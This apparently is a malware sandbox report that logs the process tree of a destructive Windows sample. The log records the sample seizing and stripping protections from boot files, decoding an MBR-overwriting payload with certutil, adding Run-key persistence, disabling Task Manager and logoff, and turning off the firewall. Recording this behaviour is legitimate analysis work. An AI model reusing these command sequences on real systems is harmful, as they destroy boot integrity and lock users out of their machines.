PID 2612 wrote to memory of 2384	2612	cmd.exe	49
PID 2612 wrote to memory of 748	2612	cmd.exe	146
PID 2612 wrote to memory of 748	2612	cmd.exe	146
PID 2612 wrote to memory of 748	2612	cmd.exe	146
PID 2612 wrote to memory of 2356	2612	cmd.exe	51
PID 2612 wrote to memory of 2356	2612	cmd.exe	51
PID 2612 wrote to memory of 2356	2612	cmd.exe	51
PID 2612 wrote to memory of 2968	2612	cmd.exe	52
PID 2612 wrote to memory of 2968	2612	cmd.exe	52
PID 2612 wrote to memory of 2968	2612	cmd.exe	52
PID 2612 wrote to memory of 2436	2612	cmd.exe	53
PID 2612 wrote to memory of 2436	2612	cmd.exe	53

Views/modifies file attributes 1 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	Process
11772	attrib.exe
12672	attrib.exe
14984
15340
2016	attrib.exe
3712	attrib.exe
2116	attrib.exe
10332
14796
3980
2784	attrib.exe
2988	attrib.exe
6916	attrib.exe
6368	attrib.exe
12976	attrib.exe
8836	attrib.exe
13844
1016	attrib.exe
2060	attrib.exe
13168	attrib.exe
2284	attrib.exe
9412	attrib.exe
6184	attrib.exe
4624	attrib.exe
5856	attrib.exe
15168
2300	attrib.exe
4340	attrib.exe
11752	attrib.exe
7772
1332	attrib.exe
5732	attrib.exe
11648	attrib.exe
12980	attrib.exe
4180	attrib.exe
7044	attrib.exe
6676	attrib.exe
3816	attrib.exe
13436
10104
1996	attrib.exe
5196	attrib.exe
15160
6388	attrib.exe
15076
6480	attrib.exe
8832	attrib.exe
4664	attrib.exe
5408	attrib.exe
7476
5096	attrib.exe
14544
2116	attrib.exe
3308	attrib.exe
5340	attrib.exe
12984	attrib.exe
8680	attrib.exe
13608	attrib.exe
14052
5300	attrib.exe
6860	attrib.exe
6596	attrib.exe
6644	attrib.exe
11160	attrib.exe

C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
"C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2200
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8391.tmp\8392.tmp\8393.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
  2⤵
  - Drops startup file
  - Drops autorun.inf file
  - Suspicious use of WriteProcessMemory
  PID:2612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K Taskdl.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2816
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32" /r
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2640
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\winresume.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2848
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\winresume.exe" /reset /c /q
    3⤵
    - Modifies file permissions
    PID:2892
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
    3⤵
    - Drops file in System32 directory
    - Views/modifies file attributes
    PID:2784
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\winload.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1220
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\winload.exe" /reset /c /q
    3⤵
    PID:2616
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\winload.exe"
    3⤵
    - Drops file in System32 directory
    PID:2504
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\hal.dll"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2500
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\hal.dll" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    PID:2536
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\hal.dll"
    3⤵
    - Drops file in System32 directory
    PID:2568
- - C:\Windows\system32\certutil.exe
    certutil -decode "C:\Users\Admin\AppData\Local\Temp\KillMBR.Shingapi.tmp" "Tasksvc.exe"
    3⤵
    - Deobfuscate/Decode Files or Information
    PID:1816
- - C:\Users\Admin\AppData\Local\Temp\Tasksvc.exe
    Tasksvc.exe
    3⤵
    - Executes dropped EXE
    - Writes to the Master Boot Record (MBR)
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1888
- - C:\Windows\system32\wscript.exe
    WScript Informacion.vbs
    3⤵
    PID:1608
- - C:\Windows\system32\rundll32.exe
    rundll32 user32.dll, SetCursorPos
    3⤵
    PID:1736
- - C:\Windows\system32\rundll32.exe
    rundll32 user32.dll, SwapMouseButton
    3⤵
    PID:2384
- - C:\Windows\system32\ipconfig.exe
    ipconfig /release
    3⤵
    - Gathers network information
    PID:748
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
    3⤵
    - Adds Run key to start application
    PID:2356
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h *.*
    3⤵
    - Drops autorun.inf file
    PID:2968
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:2436
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:1076
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:1596
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:1796
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:1560
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:1080
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:1672
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:1676
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:2648
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:2768
- - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
    C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2752
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8B8D.tmp\8B8E.tmp\8B8F.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
      4⤵
      Drops startup file
      PID:2020
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:2940
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2148
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        5⤵
        Possible privilege escalation attempt
        Suspicious use of AdjustPrivilegeToken
        
        PID:2084
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        5⤵
        
        PID:2368
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        5⤵
        Views/modifies file attributes
        
        PID:2284
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:2508
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        5⤵
        
        PID:2188
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        5⤵
        Views/modifies file attributes
        
        PID:1016
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2116
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        5⤵
        
        PID:1084
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        5⤵
        
        PID:2228
    - - C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        5⤵
        
        PID:2400
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        5⤵
        
        PID:2744
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        5⤵
        
        PID:2244
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:3056
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        5⤵
        Adds Run key to start application
        
        PID:1876
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        Drops autorun.inf file
        
        PID:1544
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:2348
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:880
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:2252
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:2088
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:2140
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:760
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:656
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:2372
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:1760
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:404
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3056
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AB8B.tmp\AB8C.tmp\AB8D.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:780
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:4856
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        
        PID:6908
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:4820
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:4912
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:4676
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:5028
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        
        PID:4216
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:4676
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:4476
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:4868
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:2116
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:2964
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:4704
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:4944
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:7104
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:6272
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:6368
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:6948
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6712
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:6308
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:5964
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7128
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:5980
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7176
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7228
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7392
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7552
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:7588
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:7616
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:7780
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:7868
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:7908
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:7964
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:8016
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:8072
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:8104
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:8144
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:8176
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:4216
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:6084
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:8220
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:8252
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:8288
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:3772
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:10648
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:2108
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:11948
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        7⤵
        Modifies Windows Firewall
        
        PID:13448
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:2964
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:1876
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:2384
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:1456
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:1232
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AEA7.tmp\AEA8.tmp\AEA9.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:4832
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:4672
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        
        PID:7156
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Modifies file permissions
        
        PID:4376
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:4052
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:3308
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Modifies file permissions
        
        PID:4324
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:4608
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:2296
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:4356
        
        C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:4064
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:4180
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:4852
        
        C:\Windows\SysWOW64\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:4436
        
        C:\Windows\SysWOW64\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:6392
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:6228
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:6484
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:5340
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:5340
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8300
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8344
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8404
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8432
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8472
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8500
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8540
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8652
        
        C:\Windows\SysWOW64\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8684
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:8708
        
        C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:8736
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        7⤵
        
        PID:8768
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:8796
        
        C:\Windows\SysWOW64\mspaint.exe
        
        mspaint
        7⤵
        
        PID:8856
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:8880
        
        C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:8980
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        7⤵
        
        PID:9036
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:9052
        
        C:\Windows\SysWOW64\mspaint.exe
        
        mspaint
        7⤵
        
        PID:9084
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:9120
        
        C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:7404
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        7⤵
        
        PID:8036
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:8044
        
        C:\Windows\SysWOW64\mspaint.exe
        
        mspaint
        7⤵
        
        PID:6000
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:1868
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:10552
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:5872
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:2056
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:13336
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall set allprofiles state off
        7⤵
        Modifies Windows Firewall
        
        PID:13804
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:2296
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:2428
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:2060
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:1948
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3080
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AC85.tmp\AC86.tmp\AC87.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:4256
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:4212
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        
        PID:7016
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:2356
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:4588
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:3712
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:3976
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:4292
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:4180
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:4852
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:3976
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:4664
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:3836
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:4312
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:4708
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:6152
        
